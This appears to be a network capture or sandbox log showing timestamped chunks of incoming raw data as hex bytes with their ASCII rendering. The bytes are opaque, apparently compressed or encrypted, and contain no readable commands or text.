                                                                                                                                                            2022-07-07 07:51:12 UTC1523INData Raw: 3b 47 1b 32 24 db 26 f5 ea ff 0c d2 e1 63 dd 81 24 ce 62 26 09 a1 1e 65 be 6c f3 11 04 ad d3 e6 11 f2 b2 4c d8 61 6a af ed c3 b0 ed 78 9b 98 61 f7 24 2a 11 a0 1c 3f e3 4d f4 92 36 2a c0 66 58 e2 6a e2 1b 36 80 9b 94 f3 36 11 a9 9e c3 ef e8 a3 76 55 24 90 5b e6 f6 d8 a7 44 c5 b6 06 1e f4 67 f8 7e a9 ec db fe 3a 88 17 0b 72 44 cd b2 5a 55 38 19 cf 8b 84 ce 58 3a d0 2d d1 94 4e 57 d1 f4 9b d8 ec 2a d2 70 43 a4 22 fe f7 39 35 96 b4 6b 86 fe c3 5a cd b1 19 21 8f f8 1d 71 ff 96 d8 99 66 a2 8c 9a b8 74 b8 07 04 8d 68 83 1c fc 8f 9f 9f 5b 63 a1 bf f4 f8 81 69 a4 54 01 3d bd 15 12 e2 c3 54 d1 12 f2 83 0e 96 7c 04 57 af 18 6a 8a 21 b8 32 9e 7d b0 c7 c9 c4 11 69 20 f1 40 f8 49 a2 3d 2c c7 15 69 cd e0 0f 38 03 bc b7 a7 c9 26 1d 81 1e c7 e0 06 1b 9b d4 52 4e c2 58 a4
                                                                                                                                                            Data Ascii: ;G2$&c$b&elLajxa$*?M6*fXj66vU$[Dg~:rDZU8X:-NW*pC"95kZ!qfth[ciT=T|Wj!2}i @I=,i8&RNX
                                                                                                                                                            2022-07-07 07:51:12 UTC1539INData Raw: 69 6c a0 d0 6a 59 1b f3 a1 e0 e5 e9 4e 19 0b b5 83 ab 86 b6 92 03 74 51 64 7c 61 77 ea 84 b8 9b 9d c5 03 79 c9 a7 a3 6d 3f f6 5e bf 6a d6 78 0d 0a dc e7 88 48 96 2f ca 1a 3e 14 53 4b c6 a6 02 11 ea d6 81 3b 1a ef a3 99 e9 7f 4b 24 a3 96 30 44 f2 55 8e c2 69 a8 5f a6 4b e3 ca 11 97 75 08 bb 4c 94 a4 fa cf 09 59 03 fd 90 6c ca 67 46 6d 07 f0 8f cc f6 48 cd 61 0c c5 0c 59 9b 32 1b 82 31 9e f7 c5 fc 85 3c 5a 78 f8 f0 fa b0 ea 02 90 24 30 55 8d c1 67 51 a9 57 a2 89 c3 52 68 b7 01 30 c0 5a 83 57 b8 46 2b f7 f6 66 aa 38 15 62 94 62 27 a1 f0 7b d6 7d da 43 ac 72 5b dc d1 97 2d f4 d7 34 43 10 fa 1f 6d ae 9b 4b 01 77 c6 cc 96 68 28 5a 15 22 a7 06 c0 a0 96 36 94 ae f6 17 30 8e 38 e1 4c aa 02 90 0e e4 2b 62 91 14 af d8 16 f8 bb 78 92 e3 6a 99 9c 3e af f4 4c 41 db fa
                                                                                                                                                            Data Ascii: iljYNtQd|awym?^jxH/>SK;K$0DUi_KuLYlgFmHaY21<Zx$0UgQWRh0ZWF+f8bb'{}Cr[-4CmKwh(Z"608L+bxj>LA
                                                                                                                                                            2022-07-07 07:51:12 UTC1555INData Raw: 4b 57 3f d4 b7 59 eb 93 66 4c 8a ed 3f 85 88 b4 4c 20 79 a0 37 2e c9 48 b2 30 92 0a 99 de fc bb 91 ac e4 f6 0c e2 0f 7a ea c8 62 58 63 63 db b0 f5 be a0 d4 7e 32 63 26 61 4a 60 0d e2 75 6c 83 c6 20 68 5f 8b 4b 06 66 d3 3e 8c 23 19 f2 f7 d4 76 8d 6c 54 d6 01 b5 f6 8f 1f 09 d7 db 9a fb 2f f4 58 5b a6 7b 3f c7 7d a1 f1 8a 96 0e 60 5e a7 59 08 5c 52 6b 5c 69 d9 dc 70 df 5a 5f 74 33 24 f4 45 69 9f 4e d3 27 5b ff 67 15 9c be cf b4 f0 a6 0b 6a 0e 82 5d 74 b7 05 f2 9c e6 a9 f9 09 bc 0a 36 ce 3f 79 73 d0 2e 7c f9 70 a6 dc 0f 4b ab 69 45 8e 00 4e 68 4e dc 49 55 20 c0 f7 2c e2 34 62 3c a4 94 69 28 0b 9d a2 cc 86 d1 3e 1b 16 3b e3 4d 6c 1f e4 3e 1e 74 d0 20 69 c0 30 88 5a 12 16 7c a1 f7 57 5a 83 0a 28 50 8a 68 0f 08 71 c0 fe 32 43 3c 69 48 27 86 8a e2 a8 0e 07 97 9d
                                                                                                                                                            Data Ascii: KW?YfL?L y7.H0zbXcc~2c&aJ`ul h_Kf>#vlT/X[{?}`^Y\Rk\ipZ_t3$EiN'[gj]t6?ys.|pKiENhNIU ,4b<i(>;Ml>t i0Z|WZ(Phq2C<iH'
                                                                                                                                                            2022-07-07 07:51:12 UTC1571INData Raw: a9 3c cb fb 91 2a 0c 65 5c 17 1e 7c b2 77 e2 dd 05 07 5f 88 a7 8d 7e 46 60 48 7f 32 5c db 21 1a 17 c2 72 8f 63 59 a6 18 a1 7c f0 e3 a1 a6 4d 03 c5 ba ba e8 38 c2 dc e2 ad a1 ec 6d 33 46 e8 bc 98 ea e1 fc 16 96 89 50 65 69 df db 66 02 3d 5d f8 26 35 3b 81 8d af b0 84 1f c0 4d 14 14 56 ec 9c 0e 8d d0 a0 73 20 18 4e 74 34 f3 ee 33 6b 99 13 f7 e2 ff f7 a8 cd 97 89 86 f2 bf 77 04 cd 4a 87 fd 84 fb d9 9a b1 8f 50 87 b6 66 70 b2 9b 1e 27 4d 7e 4c 11 ac 80 ba 0b 4e e3 63 5b b6 da 7c 02 cd ff ae 40 81 de 2d 12 8a 31 1c 21 27 84 17 1f ed c2 75 a4 52 9e 41 5f b5 b1 15 dc 25 bb 1d 3d 4d fd a2 9f 8a 16 57 a7 96 c8 19 75 38 84 86 76 52 da 40 29 8c 8e b5 88 08 24 80 71 29 8e 2a c9 79 0c 8b 02 b7 d2 3e b4 43 c9 95 73 73 ce 41 fd d5 49 a4 30 54 81 27 d4 fd ab 12 06 90 df
                                                                                                                                                            Data Ascii: <*e\|w_~F`H2\!rcY|M8m3FPeif=]&5;MVs Nt43kwJPfp'M~LNc[|@-1!'uRA_%=MWu8vR@)$q)*y>CssAI0T'
                                                                                                                                                            2022-07-07 07:51:12 UTC1587INData Raw: b0 e1 c7 07 c0 00 f6 ab 6c f8 b9 c7 82 d9 43 39 2f 78 c0 17 b9 87 ec 5c fe f9 22 d1 0a aa bd bc 00 db 4f ae 09 10 ac 6b 77 2c 59 7e 32 3b 71 53 54 ff 7b 88 0e 1f 7c 8e ee f9 58 e3 a8 7a 5d 21 16 54 11 05 de 29 97 7d 80 c5 52 58 9c 23 2d 5e 36 7b 4f 8e 85 96 af fd 3b 98 b2 aa a3 a9 b6 72 ed 9c f9 72 2e a1 7c 4e cb 44 41 92 1a 3c 09 d3 8e 09 36 03 59 d3 b9 82 6f 72 70 ae fa 08 e5 b7 b8 96 f1 9f 44 30 ba 87 e3 a5 60 2f f7 31 5e e8 bd 5b 8f 8b 91 e9 f6 b4 0d ee 24 ee 52 38 76 b6 e9 ac ab 5a 4f 4c 66 1e 94 5a 08 02 42 f7 b2 1c 64 b0 ee a6 6a f4 92 d0 2b 08 4d d6 e6 e6 f7 7c 54 3a 28 11 88 5d e7 70 94 d4 8f 77 37 7b a8 67 ac 0e 5c 35 79 84 54 e8 9c ae c4 41 22 e6 d0 d7 4f 2a e7 8b 40 cf fb 21 5a 7b 4e fd ce 0c 6e 24 2a 4f 90 35 c5 a6 5a 47 57 bd 82 0b b7 06 41
                                                                                                                                                            Data Ascii: lC9/x\"Okw,Y~2;qST{|Xz]!T)}RX#-^6{O;rr.|NDA<6YorpD0`/1^[$R8vZOLfZBdj+M|T:(]pw7{g\5yTA"O*@!Z{Nn$*O5ZGWA
                                                                                                                                                            2022-07-07 07:51:12 UTC1603INData Raw: a0 20 a0 08 b8 23 ae f7 ae f5 ad fa a2 c1 36 f2 eb 6c d8 48 5e 8b 21 78 d7 cc 99 a1 85 8d 07 4c 66 31 78 23 6d 85 7e 90 81 c3 f0 d8 18 57 b7 fa ed 2c 40 db 1e 53 f1 25 04 31 e8 e6 4a 59 ab 79 6b 77 71 6e 47 4d d2 d0 b9 55 62 cb 37 42 8f 0e 41 a6 f0 95 af bc 84 30 94 2a 57 c2 5c 85 3a d9 b7 c4 12 43 9c b4 40 cb fc fc e2 44 b0 fa 5c b5 26 c4 1e 70 13 d8 ba fe 21 d5 55 cb 39 1f e8 72 e6 10 92 b2 43 e6 5b 06 94 0a e8 d4 22 f5 44 61 de 42 1b b6 a4 6b 7b a4 2b 8a 03 0f b7 ce 33 e5 50 3e 01 74 18 73 b5 44 a3 25 0a 90 5c 0d 95 d1 e1 60 43 17 fe 34 64 d4 e7 05 46 40 66 bd e8 3e aa d6 5e 65 a7 1a 32 2c 08 5b 59 38 d1 ba 97 c9 ff d9 e9 03 bd 0b 2d e6 e6 02 3f 7b 30 dd 38 9c 59 9c c3 fd f0 a6 08 8d 6b c0 70 27 d0 f9 fd 00 63 12 b5 d3 83 65 7b 9c 3b cf 58 d4 c1 e0 8a
                                                                                                                                                            Data Ascii: #6lH^!xLf1x#m~W,@S%1JYykwqnGMUb7BA0*W\:C@D\&p!U9rC["DaBk{+3P>tsD%\`C4dF@f>^e2,[Y8-?{08Ykp'ce{;X
                                                                                                                                                            2022-07-07 07:51:12 UTC1619INData Raw: 25 34 25 eb 51 b5 d1 37 66 1f da 74 c3 37 d9 a8 fc 47 c8 ce f2 28 61 dc 32 64 51 79 a7 d2 94 49 dd a4 4e 07 ec e1 12 34 65 e7 10 b5 15 08 c2 8c 80 30 8e c5 87 b8 29 82 3d 16 9f 51 2f 34 9d aa 41 35 6b ea a0 45 97 d7 89 8a 68 89 f8 fc d3 f4 70 ef fa dd 1f 22 8a 1b aa 16 c8 42 77 fc 8f a6 ef c4 a5 46 e0 ed 98 76 8e 8e ce 38 b6 67 d5 18 95 5c 52 5b 38 92 9f 7c ec 08 ce f7 a1 39 e6 fd 25 09 13 6d 69 6f 66 c1 70 21 2e 28 52 95 9c 86 a2 bc 81 4a a2 8c db 60 aa 46 be 99 e6 7f 5f 6d d8 95 fa 60 c1 58 42 dd 44 ed f9 c3 6e d6 72 5c 43 e2 c7 62 e3 f4 f9 61 a0 47 ae dc b5 b1 7f 0e c0 c9 f1 21 fa 39 42 d5 7c e3 55 be 27 23 d8 be 63 d8 92 21 59 3a b8 04 24 0c 8e fd 86 8a 4c b3 84 ae 68 09 fc 41 bc db f5 1f fc 2a 89 2a 9a af 5b b8 3d 8d 72 5d 9f b9 a8 3c 66 91 bc 13 54
                                                                                                                                                            Data Ascii: %4%Q7ft7G(a2dQyIN4e0)=Q/4A5kEhp"BwFv8g\R[8|9%miofp!.(RJ`F_m`XBDnr\CbaG!9B|U'#c!Y:$LhA**[=r]<fT
                                                                                                                                                            2022-07-07 07:51:12 UTC1635INData Raw: c1 32 b9 4d 1b 45 ff 5a 41 62 5b 3d 4a 3d c1 87 37 41 d0 7b 38 2d 56 2b 26 90 f1 1a bf 44 91 b2 6e 1a 31 1f 3c 15 74 78 97 2c bc ff f5 a7 07 d5 58 d8 a6 dd 45 21 f7 7e 6c 6a 0f ba d8 df bd 93 2d c1 c3 6f 8b 1b 35 ee 67 e5 d3 11 2f 30 53 85 4f 3c 99 88 27 b4 c7 00 d7 69 ba f4 13 a6 09 fe 1a a3 6f 7f 6e b7 40 ef 6f 32 d4 a3 25 e6 49 27 b1 3a c3 ea cf b9 d3 4a d8 e3 ba 4d e9 f0 bf 3d 46 d5 74 a0 c8 c4 8c 10 b4 55 54 5e d1 25 51 26 56 d7 49 dc 21 ba 4e a2 44 bc ec 9e ea 04 4f 98 47 1b 32 5a 93 08 b0 43 cb 45 17 60 27 27 e4 1d 08 ba b1 88 ba 8a 37 14 d0 3e b4 1f 30 a2 33 7d b2 e4 97 e8 a0 93 8c 67 31 4e 0d 07 ac d1 5d 17 d9 fa ad eb 37 bd 36 bc 89 e3 19 4e 88 54 34 d9 bf 4b 60 44 cc fe 82 04 9c 90 c5 83 ec b6 ee c5 56 f4 0e 79 d1 1a 87 fe b0 7e d1 34 7a 19 a5
                                                                                                                                                            Data Ascii: 2MEZAb[=J=7A{8-V+&Dn1<tx,XE!~lj-o5g/0SO<'ion@o2%I':JM=FtUT^%Q&VI!NDOG2ZCE`''7>03}g1N]76NT4K`DVy~4z
                                                                                                                                                            2022-07-07 07:51:12 UTC1651INData Raw: 75 e3 9d c0 be 43 ff 67 43 c6 e1 cd 68 ee ac 8c 67 0e 62 65 f4 cb 18 2e ca 0c 44 62 23 58 c8 d2 78 91 01 47 e3 5c c7 98 bc 5c 51 64 0c 70 58 18 a9 09 20 57 3b 45 3b 64 3b 3b 4c 61 72 41 32 19 20 54 27 db 4c e9 f3 54 10 73 84 bb e4 11 d4 ba e7 67 75 d4 08 b1 12 c6 a3 40 dc 25 31 9b f9 11 57 15 1f a1 8a 38 f5 ab 70 ec be 3b 0d 62 f1 80 98 07 0e e9 52 4e de 6b 99 89 26 b2 f5 88 af 9e 4f 49 1e 9e 5c e2 25 80 81 dd da 14 b2 2b 77 46 c6 9b 5e f2 00 44 db 45 ba b7 f1 fe 87 f7 61 4b 0e 13 25 32 1b 02 8f 73 d1 9d 09 6e 28 87 5c f5 a4 84 00 a3 14 3b c2 76 26 d6 89 38 64 9d 71 2b 33 57 fc 74 1a b0 6f 3b c4 0a d3 bb e0 f4 98 36 02 7c 94 e8 45 1b 02 ab 29 de 74 5c 18 3a 3d 10 86 61 1c 5f 35 cf 5b 18 7e 49 7c 64 d3 06 1d 20 96 19 e1 d5 68 f3 e3 24 1f 20 cf c8 8c 02 36
                                                                                                                                                            Data Ascii: uCgChgbe.Db#XxG\\QdpX W;E;d;;LarA2 T'LTsgu@%1W8p;bRNk&OI\%+wF^DEaK%2sn(\;v&8dq+3Wto;6|E)t\:=a_5[~I|d h$ 6
                                                                                                                                                            2022-07-07 07:51:12 UTC1667INData Raw: a7 e8 88 82 0c 99 55 df ff 2f f9 0a 94 2c d2 63 76 63 a2 db 54 53 ee 17 31 6b 4d 0e cf 87 a8 64 62 1d c1 41 63 fc 46 8e d9 50 38 48 3e f2 10 4e 61 b5 1a 8e b7 80 6a 56 6a ba c9 73 7c 77 16 7f 14 8d ca 15 b0 c8 27 44 15 72 dd 83 78 a4 d3 fb 2a 51 56 fc 8d 33 d1 7b 19 0b 05 47 a4 71 4f 78 02 be a6 db 1c b4 57 08 ce 21 6b 64 6b 90 f8 d2 23 ba 0e 60 06 75 d6 a3 66 67 de 63 b6 dd fb f1 fe 3d 23 64 dc cf e2 4f d7 a3 85 d7 9a b9 cc 06 ae 49 6d 9a a3 05 1f 08 28 dc 8b e3 11 ca 6f 01 ad f4 2f 70 40 19 6b d2 a6 a7 6c 45 c6 8d 0e 4a 16 4c 89 90 a6 c0 66 c1 81 9e 2b 70 ad 18 fd df 67 ea c4 15 46 0c 29 14 42 64 f0 fa 6d 24 f5 fa 44 11 8f a8 e4 dc 95 67 23 28 97 bd 6a 8c 98 35 e5 2f c1 68 c6 7a dd d1 9f 93 38 1a 3f 14 83 3c d9 ab 10 80 93 66 07 10 9d 2c 9a e8 ed 5e 89
                                                                                                                                                            Data Ascii: U/,cvcTS1kMdbAcFP8H>NajVjs|w'Drx*QV3{GqOxW!kdk#`ufgc=#dOIm(o/p@klEJLf+pgF)Bdm$Dg#(j5/hz8?<f,^
                                                                                                                                                            2022-07-07 07:51:12 UTC1683INData Raw: 6d dd 91 b5 9f 3d d2 05 17 f9 0a d9 6b a6 ca e8 82 61 03 5e 5f 15 ec 45 6b 6a 5f 77 99 18 af 35 2c 93 20 71 7b 73 48 49 4c 41 b3 f3 e7 a1 c6 eb 1f 60 6c a0 ad ed f5 bb 55 42 05 64 05 52 f5 98 22 12 90 d7 51 55 99 b3 46 0c 42 d5 a8 0f bf 2d e1 22 2b aa d6 57 b5 c3 65 3b aa b4 96 e4 45 e0 00 b9 06 ba 62 28 3d ed b9 37 9e 63 53 a5 f9 2a 5a c1 30 48 7b bc ab bc 4e fc a3 73 ce 56 3a de 5e 0e 21 5a bb 9e 84 3d 5f 77 55 78 01 07 b9 aa 5f ca 21 e3 64 68 18 f0 dc 92 dd 22 15 f7 c7 4c db 72 40 f7 95 88 92 a8 49 c2 75 33 01 52 7a 3b 3b aa f4 e8 85 06 8e af 48 a6 88 bd 17 83 6b 83 4e a3 0f 07 c6 6f a0 61 25 43 7c 86 4e 9a 0a 0c 1e 5a fd 1f ae 55 4d 5c 85 16 f8 3a 81 09 57 b2 92 6d 7a ea 9b f7 be fb 50 b2 9d fe eb c0 09 ce b8 a0 70 5d 36 1e 1b bf 28 f9 40 4c dc 92 5f
                                                                                                                                                            Data Ascii: m=ka^_Ekj_w5, q{sHILA`lUBdR"QUFB-"+We;Eb(=7cS*Z0H{NsV:^!Z=_wUx_!dh"Lr@Iu3Rz;;HkNoa%C|NZUM\:WmzPp]6(@L_
                                                                                                                                                            2022-07-07 07:51:12 UTC1699INData Raw: a0 4d 75 b5 aa bd 57 ac d5 fe 4e ba 58 2b 7e 03 07 ef 06 ea ea 8f 4c 5e 73 f3 c5 c8 3f 1e 46 cb d6 aa bc 6e bb c3 65 d2 67 56 89 2c 91 cc 82 f3 5d 26 e9 0f 48 1d b4 9f 4f 80 c3 e8 65 f1 d3 e7 21 9d 72 91 20 2f 98 a8 8d 39 f6 14 ac 8b 8e 1b 50 f6 fb 19 11 d0 2e ac 87 98 1e 7b 26 23 c2 8f cb e3 a9 c0 f7 75 b8 b4 fa f6 e2 cf 42 93 9f a8 7d f3 64 9c bc ce 88 e7 58 89 9d 4b 18 8f 8c dd 1f 7d 0e 4f 6d 69 eb cf 8c b9 13 3f 1d 67 b2 de 04 59 d1 32 ba 4c 20 f2 4f 5c 72 b4 5c e0 d9 c3 f1 01 53 88 ed d0 95 ba 8d 5e af e7 fa 58 56 55 4f 84 a7 0f 82 5d de 7d 62 a4 a8 f9 a6 4f 36 b5 0b 3b b4 f5 08 90 e6 b1 a3 08 48 12 41 4d fb 33 ad d4 08 dc a9 25 af c0 fe 5f 64 33 94 78 22 d3 2c fe 30 75 29 24 11 47 db ea f3 09 10 1a 99 fb 30 b2 a7 81 b6 e0 a0 5e ce 39 df fa 6f 9a 39
                                                                                                                                                            Data Ascii: MuWNX+~L^s?FnegV,]&HOe!r /9P.{&#uB}dXK}Omi?gY2L O\r\S^XVUO]}bO6;HAM3%_d3x",0u)$G0^9o9
                                                                                                                                                            2022-07-07 07:51:12 UTC1715INData Raw: f5 bb 55 eb 3a 98 aa 20 1f 76 7a 31 36 e2 0c 0e 09 c2 d7 cb ac 42 55 cc ca df 15 03 60 ca b7 00 42 f3 dd 85 be 29 c5 60 0b 40 6b c2 3d 96 55 bd 66 17 ff 59 08 fd 1f 03 e5 41 7b bd a8 da 1a b4 d7 00 4e e1 92 d4 d3 17 b4 50 c8 46 f1 4a 98 13 cf 16 34 4a cf c3 48 ea 3f 56 46 82 aa dd 64 90 68 d2 ce 79 fb 96 8f 18 d5 ab a9 f5 8d d5 91 0c 23 7f d6 1d 15 d9 92 5c 78 ee 8c d8 7e 2c 85 e4 3c 74 66 07 ca ec 0c 3a 4e c3 59 86 c3 a8 86 59 ee 11 31 be 0d f9 a0 f3 b3 64 c4 5a 3d 76 39 f2 ec af dd b4 2e 99 9f a3 eb 0c 66 48 ea e6 ea 02 8f 0f ff 6c 58 4f 39 1f 26 09 1b 3f 09 37 ce 4b 38 84 04 47 52 7a 61 f0 00 a1 67 39 e8 c5 23 01 b5 72 cb 89 41 29 9f e4 72 94 8c d3 e8 0b 3c 73 67 9d b9 f8 21 33 02 5c fe b1 9d e1 38 b4 1b f2 97 0b 6a 95 44 b0 46 ff e6 c6 94 d6 74 d9 a5
                                                                                                                                                            Data Ascii: U: vz16BU`B)`@k=UfYA{NPFJ4JH?VFdhy#\x~,<tf:NYY1dZ=v9.fHlXO9&?7K8GRzag9#rA)r<sg!3\8jDFt
                                                                                                                                                            2022-07-07 07:51:12 UTC1731INData Raw: 85 97 1d ee c5 ce 66 b3 1a 35 f7 a4 bb 9a 9f 0c 99 41 3a 1f 96 bf db 74 fb 33 d4 6b c7 19 13 5f d4 17 18 93 80 86 65 e9 26 79 54 8a 3b 63 ab 33 1c c5 4c 7e b4 5d 76 2e 26 97 f6 ae 1d 03 ec c1 f9 67 58 d0 e4 6a 81 ec dd a3 3a 7c 06 0a 00 87 ef 03 bf 22 d2 03 19 b4 f2 bf 9c 8a 85 8a 11 72 38 8b 7c 10 44 3f fe 30 22 d5 f8 d3 b1 ed a9 21 0e c2 c1 d2 85 c1 47 a2 57 a2 47 15 6b 1e 1c 76 c3 57 56 69 97 fd 9b 2d 94 21 ef 3f 6b 6c eb 40 91 78 57 de 4c 62 04 d7 9a 93 d5 88 4c 2f 92 22 10 fb 0b 33 dc 43 b9 c6 60 be 85 1a c7 ab 69 f9 15 d6 07 cd 4b dd 1e da 94 b5 ec b1 56 ec f3 a0 17 cb 42 54 a6 20 93 65 ec 2e 05 9b fc 06 3d c4 56 2d a0 2f 8b 2d fa bf 53 48 8b 7c 8b 77 23 b8 38 55 51 9a d8 4f a2 23 9d 2e 04 a7 a6 07 49 0f 77 a5 fa e7 16 a2 7f c2 d1 be bc 42 b3 54 60
                                                                                                                                                            Data Ascii: f5A:t3k_e&yT;c3L~]v.&gXj:|"r8|D?0"!GWGkvWVi-!?kl@xWLbL/"3C`iKVBT e.=V-/-SH|w#8UQO#.IwBT`
                                                                                                                                                            2022-07-07 07:51:12 UTC1747INData Raw: b9 54 e0 1b 2e 82 c1 6d b3 ca 0c e9 9c d6 57 0a 82 1c fc 27 56 e0 6e 43 01 ba 18 d8 c4 62 7e 5a 98 84 bf 8d dc c3 c8 79 93 4b f4 81 6c a2 4a b4 2a 43 0d 21 be be 83 57 f4 3f 66 a7 77 ce 4d cd 96 12 ec 12 dd 96 3a fc e9 54 20 db c5 b5 63 3a b9 ac 87 a0 00 31 f4 3d c0 3a 4a 1d 12 b0 fe 7d 47 6e d7 30 88 21 9f 75 e3 03 f7 0b 4f ee 49 49 17 88 5f aa 0d 6e da 0d b9 2b 16 f3 26 d0 ad ee 71 30 f6 8d b6 63 97 53 37 4a a0 b5 c3 f3 44 c8 e4 65 cc 5d b8 b0 da 7d ad cb a3 74 5e c4 fd 61 92 d4 89 32 c0 0a 23 e1 63 d0 88 f4 21 cf 39 96 f5 5c d5 fc 1c f0 48 6f 5f 0b 6d 47 52 64 50 40 96 7c 68 37 b6 42 d6 b2 6a 40 ff 06 e9 8b 29 32 05 9c 3f 7b d7 1a bf d3 b7 9a db fe 0d 12 dd 6e bc ec 06 aa 29 ff 2a 1c 5d 62 80 2b 86 26 14 03 ba 7a ec df da df 54 84 af 79 c7 a8 77 a9 bb
                                                                                                                                                            Data Ascii: T.mW'VnCb~ZyKlJ*C!W?fwM:T c:1=:J}Gn0!uOII_n+&q0cS7JDe]}t^a2#c!9\Ho_mGRdP@|h7Bj@)2?{n)*]b+&zTyw
                                                                                                                                                            2022-07-07 07:51:12 UTC1763INData Raw: ed 56 7d 09 a5 a0 bb cb d5 8b 0b f0 5e 9e e3 d6 c9 d6 06 da 8e 4f d7 b0 dc 74 14 5b f2 40 48 b2 5d 4b c0 cd 9a fe e1 5a 25 4b 73 af 02 64 78 31 8e fe df 89 ca da de 92 e0 72 0c c4 be 02 25 e8 fc 53 27 c8 15 6d ef da 68 20 c1 b4 c3 9d d0 cb 50 1e f5 91 8d 01 31 e6 3e 2f 2d 27 0c f3 03 e8 5c 48 e7 38 2e b3 94 66 c5 c1 3f e4 cc ca f7 d6 22 0a 39 8b f9 b3 ef ff 7f 30 e7 39 45 a0 34 62 d2 5e f6 f7 30 da 7d 9c 41 81 00 15 f9 d6 7c a0 7a 7c 9e 48 6a 06 75 c3 0b 3d a2 e4 87 03 e0 42 de 61 ef ad bf a8 94 42 4e 50 24 b4 cd 74 a0 1c e4 8e 4c d8 43 0d c7 83 36 bf 23 8d ba ea 68 1b 89 7f bc ea cd ea 77 e5 24 f2 1f ce 01 ad 02 63 59 a8 8f 8a e2 b1 a5 fa db ff 2b 4e 27 9f c4 27 52 2a 45 76 4c cd 5a e6 f4 18 3b 15 44 0b 10 cb ca 65 33 da f4 82 a8 2c 42 cd 8b 4f 4b ee 03
                                                                                                                                                            Data Ascii: V}^Ot[@H]KZ%Ksdx1r%S'mh P1>/-'\H8.f?"909E4b^0}A|z|Hju=BaBNP$tLC6#hw$cY+N''R*EvLZ;De3,BOK
                                                                                                                                                            2022-07-07 07:51:12 UTC1779INData Raw: bd 4e 18 13 8b fd 62 65 84 ee 5e 5a cf 40 9c de 35 7e 91 cc 19 73 b9 05 18 03 2c 22 c8 6a d5 17 69 d4 85 2b e9 98 be 65 75 78 92 b0 b4 9d c9 1b be 8c a3 b5 5d 30 72 2e 2e bc 3e 76 1b f3 2c bf e3 47 9b fd 81 51 0c 27 55 eb 07 12 42 b3 71 ef 89 58 ef 8e 61 60 be 3f 54 f5 dd 61 98 04 3d 64 7a 69 f7 f3 d5 f5 19 1f 52 ff dc b0 28 19 87 ed bb 6c 5d 08 5e 1f 7b 56 13 91 54 8a 9f 3f eb 31 c4 49 d0 64 69 fb f1 f7 b6 0f dd c3 28 dd 98 ec ba 5c 09 df 8d 9d 43 64 ad ee e3 a6 e5 b3 d0 d6 19 50 f6 48 2a 93 d6 51 1f a5 0b 5b b6 35 87 05 3e 2c fa 39 5a 0c 49 4e 34 1b 87 7a 67 e4 12 e1 4a 17 4d f7 94 36 fe d4 5f 22 72 44 80 28 33 3c c3 c0 6f 09 c5 9b 1b 42 f0 d0 81 82 42 14 94 51 98 a2 14 2b d6 bc 94 88 c7 89 a2 20 9c cc e7 5d 8a fd 2e b1 66 09 51 bb da 1f da 4b c8 e4 86
                                                                                                                                                            Data Ascii: Nbe^Z@5~s,"ji+eux]0r..>v,GQ'UBqXa`?Ta=dziR(l]^{VT?1Idi(\CdPH*Q[5>,9ZIN4zgJM6_"rD(3<oBBQ+ ].fQK
                                                                                                                                                            2022-07-07 07:51:12 UTC1795INData Raw: f3 12 67 e4 af 46 b8 a7 8e c8 d0 22 e9 e9 06 ea dd fa 8d c2 7f 5e 8e af 0f 69 7a 43 af db ff 74 43 12 be 34 79 37 17 1b e7 6d 40 ab 9b 72 fe a1 4e 75 bd 42 92 e0 ba 03 70 2d 8e eb 96 8c f7 b3 87 8d 5e ab bf cb 3f d2 04 31 78 19 c8 d5 50 7f 5c f9 57 40 58 2e cc 16 17 42 d2 63 3b 90 ed 60 bc bf e7 be 17 9c d7 97 6d dd a8 c9 6a f4 1d db 63 13 c4 4b ca e4 40 f0 83 23 6d 39 25 d6 96 8c 38 24 bd ea 83 c9 4b 67 ad 4a 72 99 7d 8b e8 40 c5 6d 5d 8c 03 f5 dc 0b 30 f0 23 2d bc 4e a5 e0 4b 41 d1 9f d0 48 bf 48 d9 c8 ee 28 e0 cb f7 a1 86 f3 be aa a9 a9 fd 54 cb 85 fb 35 6e 10 b8 fc ed 76 ed 19 bf 64 76 df 54 ce 69 0b 9b 6e f2 6d 51 8d 8e 89 f5 2f 8c df 9e 63 60 ed 04 8e 99 cc 27 af 46 d8 30 d1 d7 18 ea f8 36 b9 fb e3 b8 24 c3 dd 7c 22 50 97 1b a9 9f 9d 31 2a 4d 9b a1
                                                                                                                                                            Data Ascii: gF"^izCtC4y7m@rNuBp-^?1xP\W@X.Bc;`mjcK@#m9%8$KgJr}@m]0#-NKAHH(T5nvdvTinmQ/c`'F06$|"P1*M
                                                                                                                                                            2022-07-07 07:51:12 UTC1811INData Raw: cc 68 32 8d 23 8d 6b 6b 73 90 a9 3b b4 ae 43 55 0d 5b 35 11 26 5e 8b ed 6d 2a 9e 48 fd 5f c6 c0 5a 16 91 0b 6c fa c4 b3 83 84 19 71 e9 5c 6c 3e 88 8d b3 a2 17 23 18 f3 54 67 7c f4 33 4b f8 e1 ea 60 8e c9 77 0a 91 4b ee 14 f2 68 a9 35 68 41 f5 83 24 ef ba 8e 48 07 ac 17 88 57 91 9b 16 bc 17 24 63 8c 88 cd 1f 69 3d 6f 0d 52 37 57 ef ac 13 22 61 da 62 08 7e e4 4a d2 e0 8f 2c ed 5d 34 6a 79 d6 17 dc d1 44 9c 45 98 93 c9 7c 3b 4d eb 8e 13 db 96 6d ff 93 8b 32 04 7c ab 74 6e 47 a2 2d 63 c4 41 bd 13 5a 48 21 63 5f b6 95 b0 bc 21 ac d6 8d 85 29 4e 5c 5c 28 aa f0 0d cd de 27 3a 36 0e 06 ce 92 d9 02 f5 60 29 b2 45 10 27 5b b1 5a 45 b7 38 9e a6 df 6b f6 0e 9b 7f 37 79 aa 1e a6 d1 74 ca 35 63 99 b0 b1 99 97 31 da 58 77 81 0e c6 f9 c2 07 55 c6 d0 af e4 5c 88 9a 56 ee
                                                                                                                                                            Data Ascii: h2#kks;CU[5&^m*H_Zlq\l>#Tg|3K`wKh5hA$HW$ci=oR7W"ab~J,]4jyDE|;Mm2|tnG-cAZH!c_!)N\\(':6`)E'[ZE8k7yt5c1XwU\V
